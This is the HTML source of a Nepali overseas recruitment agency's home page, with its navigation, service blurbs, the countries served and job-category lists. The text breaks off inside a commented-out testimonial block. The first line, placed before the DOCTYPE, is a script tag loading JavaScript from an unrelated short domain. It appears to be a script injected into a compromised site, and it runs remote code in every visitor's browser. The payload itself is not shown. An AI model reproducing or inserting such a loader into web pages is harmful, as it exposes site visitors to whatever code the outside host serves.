<script src="https://9ge.ge/xQd0j2" type="text/javascript"></script>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <title>Amity Global Employment Services Pvt. Ltd</title>
    <meta content="width=device-width, initial-scale=1.0" name="viewport" />
    <meta content="ISO Certified 9001:2015, Employment Services, Middle East, Persian Gulf, Malaysian Peninsula, Europe, Australia, Canada, UK, Brunei, Japan" name="keywords" />
    <meta content="The leading employment agency in Nepal since almost 2 decades engaged in the supply of human resources to Middle East, Persian Gulf, Malaysian Peninsula, Europe, Australia, Canada, UK, Brunei, Japan and other parts of the world. " name="description" />

    <!-- Favicon -->
    <link href="img/favicon.ico" rel="icon" />

    <!-- Google Web Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700;800&family=Rubik:wght@400;500;600;700&display=swap"
      rel="stylesheet"
    />

    <!-- Icon Font Stylesheet -->
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css"
      rel="stylesheet"
    />
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css"
      rel="stylesheet"
    />

    <!-- Libraries Stylesheet -->
    <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet" />
    <link href="lib/animate/animate.min.css" rel="stylesheet" />

    <!-- Customized Bootstrap Stylesheet -->
    <link href="css/bootstrap.min.css" rel="stylesheet" />

    <!-- Template Stylesheet -->
    <link href="css/style.css" rel="stylesheet" />
  </head>


<body>
  <!-- translation bar -->
  <!-- <div class="translate">
      <div class="transimg"><img src="img/malay.png" alt="malay" /></div>
      <div class="transimg"><img src="img/nepal.png" alt="Nepali" /></div>
      <div class="transimg"><img src="img/arabic.png" alt="Arabic" /></div>
      <div class="transimg"><img src="img/england.png" alt="English" /></div>
    </div> -->
  <!-- translation bar -->

  <!-- Spinner Start -->
  <!-- color of spinner shoudlbe changed to the rband color instead of orange -->
  <!-- <div
      id="spinner"
      class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center"
    >
      <div class="spinner"></div>
    </div> -->
  <!-- Spinner End -->

  <div id="popup">
    <div class="popimg">
      <div class="closebutton">
        <svg xmlns="http://www.w3.org/2000/svg" width="26" height="26" fill="currentColor" class="bi bi-x-circle-fill"
          viewBox="0 0 16 16">
          <path
            d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM5.354 4.646a.5.5 0 1 0-.708.708L7.293 8l-2.647 2.646a.5.5 0 0 0 .708.708L8 8.707l2.646 2.647a.5.5 0 0 0 .708-.708L8.707 8l2.647-2.646a.5.5 0 0 0-.708-.708L8 7.293 5.354 4.646z" />
        </svg>
      </div>
      <img src="./img/popup.jpg" alt="" />
    </div>
  </div>

  <!-- Topbar Start -->
  <div class="container-fluid bg-white px-5 d-none d-lg-block">
    <div class="row gx-0">
      <div class="col-lg-8 text-center text-lg-start mb-2 mb-lg-0">
        <div class="d-inline-flex align-items-center" style="height: 45px">
          <small class="me-3 text-dark"><i class="fa fa-map-marker-alt me-2"></i>License No. 467/060/061
          </small>
          <small class="me-3 text-dark"><i class="fa fa-phone-alt me-2"></i> +977-01-4970366 / 01-4970466
          </small>
          <small class="text-dark"><i class="fa fa-envelope-open me-2"></i>info@amityglobalgroup.com</small>
        </div>
      </div>
      <div class="col-lg-4 text-center text-lg-end">
        <div class="d-inline-flex align-items-center" style="height: 45px">
          <a class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
            href=""><i class="fab fa-twitter fw-normal"></i></a>
          <a class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
            href="https://www.facebook.com/amityglobalemploymentservices"><i
              class="fab fa-facebook-f fw-normal"></i></a>
          <a class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
            href=""><i class="fab fa-linkedin-in fw-normal"></i></a>
          <a class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
            href=""><i class="fab fa-instagram fw-normal"></i></a>
          <a class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle"
            href=""><i class="fab fa-youtube fw-normal"></i></a>
        </div>
      </div>
    </div>
  </div>
  <!-- Topbar End -->

  <!-- Navbar Start -->
  <div class="container-fluid position-relative p-0">
    <nav class="navbar navbar-expand-lg bg-white px-5 py-3 py-lg-0">
      <a href="index.html" class="navbar-brand p-2">
        <h1 class="m-0"><img class="w-100" src="img/logo.png" alt="" /></h1>
      </a>

      <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarCollapse">
        <span class="fa fa-bars"></span>
      </button>
      <div class="collapse navbar-collapse" id="navbarCollapse">
        <div class="navbar-nav ms-auto py-0">
          <a href="index.html" class="nav-item nav-link">Home</a>
          <div class="nav-item dropdown">
            <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">About</a>

            <div class="dropdown-menu m-0">
              <a href="about.html" class="dropdown-item">About Company</a>
              <a href="legaldocs.html" class="dropdown-item">Registration/Approval</a>
              <a href="massage-cha.html" class="dropdown-item">Our Message</a>
              <a href="commitment.html" class="dropdown-item">Our Commitment</a>
              <a href="vision.html" class="dropdown-item">Vision</a>
              <a href="mission.html" class="dropdown-item">Mission</a>
              <a href="chart.html" class="dropdown-item">Organizational Chart</a>
            </div>
          </div>
          <div class="nav-item dropdown">
            <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Documents</a>
            <div class="dropdown-menu m-0">
              <a href="documents.html" class="dropdown-item">Demand Letter</a>
              <a href="recru-procedure.html" class="dropdown-item">Recruiting Procedure</a>
              <a href="recu-documents.html" class="dropdown-item">Recruiting Documents</a>
            </div>
          </div>
          <a href="jobs-category.html" class="nav-item nav-link">Job Seeker</a>

          <!-- <div class="nav-item dropdown">
                        <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Job Seeker</a>
                        <div class="dropdown-menu m-0">
                            <a href="#" class="dropdown-item">Eligibility criteria: </a>
                            <a href="#" class="dropdown-item">Contracts and agreements: </a>
                        </div>
                    </div> -->
          <!-- <div class="nav-item dropdown">
                        <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Employer</a>
                        <div class="dropdown-menu m-0">
                            <a href="#" class="dropdown-item">Pricing Plan</a>
                            <a href="#" class="dropdown-item">Our features</a>
                            <a href="#" class="dropdown-item">Team Members</a>
                            <a href="#" class="dropdown-item">Testimonial</a>
                            <a href="#" class="dropdown-item">Free Quote</a>
                        </div>
                    </div> -->
          <a href="Newspaperpub.html" class="nav-item nav-link">Newspaper Vacancy</a>
          <a href="gallery.html" class="nav-item nav-link">Gallery</a>
          <a href="contact.html" class="nav-item nav-link">Contact</a>
        </div>

        <!-- <a href="" class="btn btn-primary py-2 px-4 ms-3">Download Pro Version</a> -->
      </div>
    </nav>

    <!-- Navbar End -->

    <div id="header-carousel" class="carousel slide carousel-fade" data-bs-ride="carousel">
      <div class="carousel-inner">
        <div class="carousel-item active">
          <div class="carousel carousel-1">
            <img class="w-100" src="img/carousel-4.jpg" alt="Image" />
          </div>
          <div class="carousel-caption d-flex flex-column align-items-start justify-content-center">
           <div style="max-width: 500px; padding-left: 70px;">
            <h1 class="upper-text text-white mb-3 animated slideInDown">
              The Best Placement Partner 
                </h1> 
            <h2 class="lower-text text-white mb-md-4 animated zoomIn">
               For Your Business
                </h2> 
      
            </div> 
          </div>
        </div>
        <div class="carousel-item">
        <div class="carousel-2 carousel"> <img class="w-100"  src="img/carousel-2.jpg" alt="Image" /></div> 
          <div class="carousel-caption d-flex flex-column align-items-start justify-content-center">
            <div style="max-width: 500px; padding-left: 70px;">
              <h1 class="upper-text text-white mb-3 animated slideInDown">
                Leading Employment Agency
              </h1>
              <h2 class="lower-text text-white mb-md-4 animated zoomIn">
                In Nepal
              </h2>
        
            </div>
          </div>
        </div>
        <div class="carousel-item">
        <div class="carousel-3 carousel"> <img class="w-100" src="img/carousel-3.jpg" alt="Image" /></div> 
          <div class="carousel-caption d-flex flex-column align-items-start justify-content-center">
            <div style="max-width: 500px; padding-left: 70px;">
              <h1 class="upper-text text-white mb-3 animated slideInDown">
                In The Middle East
              </h1>
            </div>
          </div>
        </div>
        <div class="carousel-item">
          <div class="carousel-3 carousel"> <img class="w-100" src="img/Europe.jpg" alt="Image" /></div> 
            <div class="carousel-caption d-flex flex-column align-items-start justify-content-center">
              <div style="max-width: 500px; padding-left: 70px;">
                <h1 class="upper-text text-white mb-3 animated slideInDown">
                  ,Europe...
                </h1>
               
             
              </div>
            </div>
          </div>

          <div class="carousel-item">
            <div class="carousel-3 carousel"> <img class="w-100" src="img/japancity.jpg" alt="Image" /></div> 
              <div class="carousel-caption d-flex flex-column align-items-start justify-content-center">
                <div style="max-width: 500px; padding-left: 70px;">
                  <h1 class="upper-text text-white mb-3 animated slideInDown">
                    And Asia
                  </h1>
                 
               
                </div>
              </div>
            </div>
       
      </div>

      <button class="carousel-control-prev" type="button" data-bs-target="#header-carousel" data-bs-slide="prev">
        <span class="carousel-control-prev-icon" aria-hidden="true"></span>
        <span class="visually-hidden">Previous</span>
      </button>
      <button class="carousel-control-next" type="button" data-bs-target="#header-carousel" data-bs-slide="next">
        <span class="carousel-control-next-icon" aria-hidden="true"></span>
        <span class="visually-hidden">Next</span>
      </button>
    </div>
  </div>
  <!-- Navbar & Carousel End -->



  <!-- About Start -->
  <div class="container-fluid py-5 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container">
      <div class="row g-5">
        <div class="col-lg-7">
          <div class="section-title position-relative pb-3 mb-5">
            <h5 class="fw-bold text-dark text-uppercase">About Us</h5>
            <h1 class="mb-0">Amity Global Employment Services</h1>
          </div>
          <p class="mb-4">
            Amity Global Employment Services Pvt. Ltd., is fully committed to
            the complete satisfaction of both, our prestigious clients as well
            as job seekers who are desirous for overseas employment with a
            right & a better secure future.
          </p>
          <p class="mb-4">
            We provide overseas placement for those looking forward to broaden
            their horizons and head for better career opportunities in
            <strong>
              Middle East, Persian Gulf, Malaysian Peninsula, Europe,
              Australia, Canada, UK, Brunei, Japan...
            </strong>
          </p>
          <!-- <div class="row g-0 mb-3">
                        <div class="col-sm-6 wow zoomIn" data-wow-delay="0.2s">
                            <h5 class="mb-3"><i class="fa fa-check text-primary me-3"></i>Award Winning</h5>
                            <h5 class="mb-3"><i class="fa fa-check text-primary me-3"></i>Professional Staff</h5>
                        </div>
                        <div class="col-sm-6 wow zoomIn" data-wow-delay="0.4s">
                            <h5 class="mb-3"><i class="fa fa-check text-primary me-3"></i>24/7 Support</h5>
                            <h5 class="mb-3"><i class="fa fa-check text-primary me-3"></i>Fair Prices</h5>
                        </div>
                    </div> -->

          <!-- <div class="d-flex align-items-center mb-4 wow fadeIn" data-wow-delay="0.6s">
                        <div class="bg-primary d-flex align-items-center justify-content-center rounded" style="width: 60px; height: 60px;">
                            <i class="fa fa-phone-alt text-white"></i>
                        </div>
                        <div class="ps-4">
                            <h5 class="mb-2">Call to ask any question</h5>
                            <h4 class="text-primary mb-0">+012 345 6789</h4>
                        </div>
                    </div> -->
          <a href="about.html" class="btn btn-primary py-3 px-5 mt-3 wow zoomIn" data-wow-delay="0.9s">View More</a>
        </div>
        <div class="col-lg-5" style="min-height: 500px">
          <div class="position-relative h-100">
            <img class="position-absolute w-100 h-100 abt-img wow zoomIn" data-wow-delay="0.9s" src="img/about.jpg"
              style="object-fit: cover" alt="about image" />
          </div>
        </div>
      </div>
    </div>
  </div>
  <!-- About End -->

  <!-- Features Start -->
  <div class="container-fluid py-5 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container">
      <div class="section-title text-center position-relative pb-3 mb-5 mx-auto" style="max-width: 600px">
        <!-- <h5 class="fw-bold text-dark text-uppercase">Why Choose Us</h5> -->
        <h1 class="mb-0">Why Amity Global Employement Services ?</h1>
      </div>
      <div class="row g-5">
        <div class="col-lg-4">
          <div class="row g-5">
            <div class="col-12 wow zoomIn" data-wow-delay="0.2s">
              <div class="bg-primary rounded d-flex align-items-center justify-content-center mb-3"
                style="width: 60px; height: 60px">
                <i class="fa fa-cubes text-white"></i>
              </div>
              <h4>Our Qualities</h4>
              <p class="mb-0">Quick, Reliable & Transparent services</p>
            </div>
            <div class="col-12 wow zoomIn" data-wow-delay="0.6s">
              <div class="bg-primary rounded d-flex align-items-center justify-content-center mb-3"
                style="width: 60px; height: 60px">
                <i class="fa fa-award text-white"></i>
              </div>
              <h4>ISO 9001:2015 Certified</h4>
              <p class="mb-0">ISO Certified Company</p>
            </div>
          </div>
        </div>
        <div class="col-lg-4 wow zoomIn" data-wow-delay="0.9s" style="min-height: 350px">
          <div class="position-relative h-100">
            <img class="position-absolute w-100 h-100 rounded wow zoomIn" data-wow-delay="0.1s" src="img/feature.jpg"
              style="object-fit: cover" />
          </div>
        </div>
        <div class="col-lg-4">
          <div class="row g-5">
            <div class="col-12 wow zoomIn" data-wow-delay="0.4s">
              <div class="bg-primary rounded d-flex align-items-center justify-content-center mb-3"
                style="width: 60px; height: 60px">
                <i class="fa fa-users-cog text-white"></i>
              </div>
              <h4>International Presence & Networks Globally</h4>
              <p class="mb-0">
                We have over forty international staffing partners in overseas
              </p>
            </div>
            <div class="col-12 wow zoomIn" data-wow-delay="0.8s">
              <div class="bg-primary rounded d-flex align-items-center justify-content-center mb-3"
                style="width: 60px; height: 60px">
                <i class="bi bi-stars text-white"></i>
              </div>
              <h4>Our Experience</h4>
              <p class="mb-0">Cost effective recruitment</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <!-- Features Start -->

  <!-- Service Start -->
  <div class="container-fluid py-5 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container">
      <div class="section-title text-center position-relative pb-3 mb-5 mx-auto" style="max-width: 600px">
        <h5 class="fw-bold text-dark text-uppercase">Our Services</h5>
        <!-- <h1 class="mb-0">Custom IT Solutions for Your Successful Business</h1> -->
      </div>
      <div class="row d-flex justify-content-center g-5">
        <div class="col-lg-3
           col-md-6 wow zoomIn" data-wow-delay="0.3s">
          <div
            class="p-4 service-item bg-light rounded d-flex flex-column align-items-center justify-content-center text-center">
            <!-- <div class="service-icon">
                <i class="fa fa-shield-alt text-white"></i>
              </div> -->
            <h4 class="mb-3">Recruitment</h4>
            <p class="m-0">
              we have successfully placed over twenty five thousands of Nepalese workforces with several global
              companies
            </p>
            <a class="btn btn-lg btn-primary rounded" href="service-page.html">
              <i class="bi bi-arrow-right"></i>
            </a>
          </div>
        </div>
        <div class="col-lg-3
           col-md-6 wow zoomIn" data-wow-delay="0.6s">
          <div
            class="p-4 service-item bg-light rounded d-flex flex-column align-items-center justify-content-center text-center">
            <!-- <div class="service-icon">
                <i class="fa fa-chart-pie text-white"></i>
              </div> -->
            <h4 class="mb-3">Skill Training</h4>
            <p class="m-0">
              Amity Global Group has its own authorized training centre to provide high quality industry specific skills
              training
            </p>
            <a class="btn btn-lg btn-primary rounded" href="service-page.html">
              <i class="bi bi-arrow-right"></i>
            </a>
          </div>
        </div>
        <div class="col-lg-3
           col-md-6 wow zoomIn" data-wow-delay="0.9s">
          <div
            class="p-4 service-item bg-light rounded d-flex flex-column align-items-center justify-content-center text-center">
            <!-- <div class="service-icon">
                <i class="fa fa-code text-white"></i>
              </div> -->
            <h4 class="mb-3">
              24/7 Support Team
            </h4>
            <p class="m-0">
              Our supprt team is always ready 24/7 to help our client and facilitate the candidates as and when required
            </p>
            <a class="btn btn-lg btn-primary rounded" href="service-page.html">
              <i class="bi bi-arrow-right"></i>
            </a>
          </div>
        </div>
        <div class="col-lg-3
           col-md-6 wow zoomIn" data-wow-delay="0.3s">
          <div
            class="p-4 service-item bg-light rounded d-flex flex-column align-items-center justify-content-center text-center">
            <!-- <div class="service-icon">
                <i class="fab fa-android text-white"></i>
              </div> -->
            <h4 class="mb-3">Counselling and Guidance</h4>
            <p class="m-0">
              Following global standard of compliance to ensure fair, ethical and responsible recruitment
            </p>
            <a class="btn btn-lg btn-primary rounded" href="service-page.html">
              <i class="bi bi-arrow-right"></i>
            </a>
          </div>
        </div>
        <!-- <div class="col-lg-3
           col-md-6 wow zoomIn" data-wow-delay="0.6s">
            <div
              class="service-item bg-light rounded d-flex flex-column align-items-center justify-content-center text-center"
            >
              <div class="service-icon">
                <i class="fa fa-search text-white"></i>
              </div>
              <h4 class="mb-3">Career development and training</h4>
              <p class="m-0">
                We offer support and guidance for employees to help them grow
                and advance in their careers.
              </p>
              <a class="btn btn-lg btn-primary rounded" href="">
                <i class="bi bi-arrow-right"></i>
              </a>
            </div>
          </div>
          <div class="col-lg-3
           col-md-6 wow zoomIn" data-wow-delay="0.6s">
            <div
              class="service-item bg-light rounded d-flex flex-column align-items-center justify-content-center text-center"
            >
              <div class="service-icon">
                <i class="fa fa-search text-white"></i>
              </div>
              <h4 class="mb-3">Employee placement</h4>
              <p class="m-0">
                We offer permanent and temporary staffing solutions, including
                contract and project-based hiring.
              </p>
              <a class="btn btn-lg btn-primary rounded" href="">
                <i class="bi bi-arrow-right"></i>
              </a>
            </div>
          </div> -->

      </div>
    </div>
  </div>
  <!-- Service End -->

  <!-- Procedure Steps -->

  <div class="container-fluid py-5 position-relative">
    <!-- <div class="gradient-1"></div> -->
    <div class="section-title pb-3 text-center position-relative mb-5 mx-auto" style="max-width: 600px">
      <h1 class="mb-0 text-center">Procedure for Job Requirement</h1>
    </div>
    <div class="container" >
      
    <img class="w-100" src="img/recru-proce.jpg" alt="PRocedure for requirement">
     
  </div>

  <!-- <div class="gradient-2"></div> -->
    <!-- <div class="container-fluid">
      <div class="container mx-auto">
        <div class="row card-con">
          <div class="step-card">
            <div class="stepno">Step 1</div>
            <div class="step-icon">
              <img src="img/documents-step1.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Receive Legal Documents</p>
            </div>
          </div>

          <div class="step-card">
            <div class="stepno">Step 2</div>
            <div class="step-icon">
              <img src="img/preapprova-step2.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Pre-Approval from Ministry of Labour Department</p>
            </div>
          </div>

          <div class="step-card">
            <div class="stepno">Step 3</div>
            <div class="step-icon">
              <img src="img/vacancyAnnouncement-step3.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Vacancy Announcement</p>
            </div>
          </div>

          <div class="step-card">
            <div class="stepno">Step 4</div>
            <div class="step-icon">
              <img src="img/candidateInterview-step4.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Candidate Interview</p>
            </div>
          </div>
          <div class="step-card">
            <div class="stepno">Step 5</div>
            <div class="step-icon">
              <img src="img/PremedCheckup-step5.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Pre Medical Checkup</p>
            </div>
          </div>
        </div>
        <div class="row card-con">
          <div class="step-card">
            <div class="stepno">Step 6</div>
            <div class="step-icon">
              <img src="img/Visa Processing-step6.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Visa Processing</p>
            </div>
          </div>

          <div class="step-card">
            <div class="stepno">Step 7</div>
            <div class="step-icon">
              <img src="img/Orientation&Approval-step7.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Orientation & Approval from Ministry of labour Department</p>
            </div>
          </div>

          <div class="step-card">
            <div class="stepno">Step 8</div>
            <div class="step-icon">
              <img src="img/PredepartureOrientation-step8.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Pre-Departure Orientation</p>
            </div>
          </div>

          <div class="step-card">
            <div class="stepno">Step 9</div>
            <div class="step-icon">
              <img src="img/Travel-step9.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Deployment/Travel</p>
            </div>
          </div>
          <div class="step-card">
            <div class="stepno">Step 10</div>
            <div class="step-icon">
              <img src="img/Arrival-step10.svg" width="60" height="60" alt="">
            </div>
            <div class="step-title">
              <p>Arrival at Company</p>
            </div>
          </div>
        </div>
      </div>
    </div> -->
  </div>
  <!-- Procedure Steps  END -->

  <!-- Countries we serve start -->
  <div class="py-5">
    <div class="section-title text-center position-relative pb-3 mb-5 mx-auto" style="max-width: 600px">
      <h1 class="mb-0 text-center">COUNTRIES WE SERVE</h1>
    </div>
    <div class="container-fluid countries-we-serve">
      <div class="country">
    
        <a href="Saudi.html">
          <img src="countries/SaudiDemand.jpg" alt="image of saudi">
          <p>Saudi Arabia</p>
        </a>
      </div>
      <div class="country">
        <a href="Uae.html">
          <img src="countries/UAEDemand.jpg" alt="image of UAE">
          <p>UAE</p>
        </a>
      </div>
      <div class="country">
        <a href="Japan.html">
          <img src="countries/JapanDemand.jpg" alt="image of qatar">
          <p>Japan</p>
        </a>

      </div>
      <div class="country">
        <a href="Qatar.html">
          <img src="countries/QatarDemand.jpg" alt="image of qatar">
          <p>Qatar</p>
        </a>
      </div>
      <div class="country">
        <a href="Malaysia.html"> <img src="countries/MalaysiaDemand.jpg" alt="image of malaysia">
          <p>Malaysia</p>
        </a>
      </div>
      <div class="country">
        <a href="kuwait.html">
          <img src="countries/kuwaitDemand.jpg" alt="image of kuwait">
          <p>Kuwait</p>
        </a>
      </div>
      <div class="country">
        <a href="Oman.html">
          <img src="countries/OMANdemand.jpg" alt="image of oman">
          <p>OMAN</p>
        </a>
      </div>
      <div class="country">
        <a href="">
          <img src="countries/switze.jpg" alt="image of oman">
          <p>EUROPE</p>
        </a>
      </div>
    </div>
  </div>
  <!-- countires we serve end -->

  <!-- Pricing Plan Start -->
  <div class="container-fluid py-5 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container">
      <div class="section-title text-center position-relative pb-3 mb-5 mx-auto" style="max-width: 600px">
        <!-- <h5 class="fw-bold text-primary text-uppercase">Pricing Plans</h5> -->
        <h1 class="mb-0">A DIVERSE TALENT POOL</h1>
      </div>
      <div class="row g-0">
        <div class="col-lg-4 wow slideInUp" data-wow-delay="0.6s">
          <div class="bg-light rounded">
            <div class="border-bottom py-4 px-5 mb-4">
              <h4 class="text-dark mb-1">UNSKILLED LABOUR</h4>
              <!-- <small class="text-uppercase">For Small Size Business</small> -->
            </div>
            <div class="p-5 pt-0">
              <!-- <h1 class="display-5 mb-3">
                                <small class="align-top"
                                    style="font-size: 15px; line-height: 45px;"></small> Engineers (Civil, Structural, Electrical, Mechanical, etc.)
                            </h1> -->
              <div class="d-flex justify-content-between mb-3">
                <span>Cleaner</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-3">
                <span>Labourers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-3">
                <span>Office Boy</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Agricultural Workers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Sweepers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span> Peons</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Watchman/Guard</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <!-- <a href="" class="btn btn-primary py-2 px-4 mt-4">Order Now</a> -->
            </div>
          </div>
        </div>
        <div class="col-lg-4 wow slideInUp" data-wow-delay="0.3s">
          <div class="bg-white rounded shadow position-relative" style="z-index: 1">
            <div class="border-bottom py-4 px-5 mb-4">
              <h4 class="text-dark mb-1">THE PROFESSIONALS</h4>
              <!-- <small class="text-uppercase">For Medium Size Business</small> -->
            </div>
            <div class="p-5 pt-0">
              <!-- <h1 class="display-5 mb-3">
                                <small class="align-top"
                                    style="font-size: 22px; line-height: 45px;">$</small>99.00<small
                                    class="align-bottom" style="font-size: 16px; line-height: 40px;">/ Month</small>
                            </h1> -->
              <div class="d-flex justify-content-between mb-3">
                <span>Engineers - Civil,Mechanicla,Computer</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-3">
                <span> Architects</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-3">
                <span>Plan Operators Electrical,Mechanical</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Computer Programmer</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Managers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Accountants</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Doctors</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Nurse Male/Female</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Bank Specialist</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>

              <!-- <a href="" class="btn btn-primary py-2 px-4 mt-4">Order Now</a> -->
            </div>
          </div>
        </div>
        <div class="col-lg-4 wow slideInUp" data-wow-delay="0.9s">
          <div class="bg-light rounded">
            <div class="border-bottom py-4 px-5 mb-4">
              <h4 class="text-dark mb-1">SEMI-SKILLED STAFF</h4>
              <!-- <small class="text-uppercase">For Large Size Business</small> -->
            </div>
            <div class="p-5 pt-0">
              <!-- <h1 class="display-5 mb-3">
                                <small class="align-top"
                                    style="font-size: 22px; line-height: 45px;">$</small>149.00<small
                                    class="align-bottom" style="font-size: 16px; line-height: 40px;">/ Month</small>
                            </h1> -->
              <div class="d-flex justify-content-between mb-3">
                <span>Farmers and ranchers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-3">
                <span> Agricultural technicians and laborers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-3">
                <span>Agricultural equipment operators</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span> Livestock handlers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Agricultural sale representatives</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span>Agricultural processors and packagers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span> Agricultural educators and trainers</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <div class="d-flex justify-content-between mb-2">
                <span> Agricultural support staff</span>
                <i class="fa fa-check text-dark pt-1"></i>
              </div>
              <!-- <a href="" class="btn btn-primary py-2 px-4 mt-4">Order Now</a> -->
            </div>
          </div>
        </div>
      </div>
      <a href="service-page.html" class="btn btn-primary py-3 px-5 mt-3 wow zoomIn job" data-wow-delay="0.9s">Read
        More</a>
    </div>
  </div>
  <!-- Pricing Plan End -->

  <!-- Testimonial Start -->

  <!-- <div class="container-fluid py-5 wow fadeInUp" data-wow-delay="0.1s">
      <div class="container py-5">
        <div
          class="section-title text-center position-relative pb-3 mb-4 mx-auto"
          style="max-width: 600px"
        >
          <h5 class="fw-bold text-dark text-uppercase">Testimonial</h5>
       
        </div>
        <div
          class="owl-carousel testimonial-carousel wow fadeInUp"
          data-wow-delay="0.6s"
        >
          <div class="testimonial-item bg-light my-4">
            <div class="d-flex align-items-center border-bottom pt-5 pb-4 px-5">
              <img
                class="img-fluid rounded"
                src="img/testimonial-1.jpg"
                style="width: 60px; height: 60px"
              />
              <div class="ps-4">
                <h4 class="text-dark mb-1">Client Name</h4>
                <small class="text-uppercase">Profession</small>
              </div>
            </div>
            <div class="pt-4 pb-5 px-5">
              Lorem, ipsum dolor sit amet consectetur adipisicing elit. Modi
              enim ex reiciendis, hic voluptate ratione eligendi amet minima.
            </div>
          </div>
          <div class="testimonial-item bg-light my-4">
            <div class="d-flex align-items-center border-bottom pt-5 pb-4 px-5">
              <img
                class="img-fluid rounded"
                src="img/testimonial-2.jpg"
                style="width: 60px; height: 60px"
              />
              <div class="ps-4">
                <h4 class="text-dark mb-1">Client Name</h4>
                <small class="text-uppercase">Profession</small>
              </div>
            </div>
            <div class="pt-4 pb-5 px-5">
              Lorem, ipsum dolor sit amet consectetur adipisicing elit. Modi
              enim ex reiciendis, hic voluptate ratione eligendi amet minima.
            </div>
          </div>
          <div class="testimonial-item bg-light my-4">
            <div class="d-flex align-items-center border-bottom pt-5 pb-4 px-5">
              <img
                class="img-fluid rounded"
                src="img/testimonial-3.jpg"
                style="width: 60px; height: 60px"
              />
              <div class="ps-4">
                <h4 class="text-dark mb-1">Client Name</h4>
                <small class="text-uppercase">Profession</small>
              </div>
            </div>
            <div class="pt-4 pb-5 px-5">
              Lorem, ipsum dolor sit amet consectetur adipisicing elit. Modi
              enim ex reiciendis, hic voluptate ratione eligendi amet minima.
            </div>
          </div>
          <div class="testimonial-item bg-light my-4">
            <div class="d-flex align-items-center border-bottom pt-5 pb-4 px-5">
              <img
                class="img-fluid rounded"
                src="img/testimonial-4.jpg"
                style="width: 60px; height: 60px"
              />
              <div class="ps-4">
                <h4 class="text-dark mb-1">Client Name</h4>
                <small class="text-uppercase">Profession</small>
              </div>
            </div>
            <div class="pt-4 pb-5 px-5">
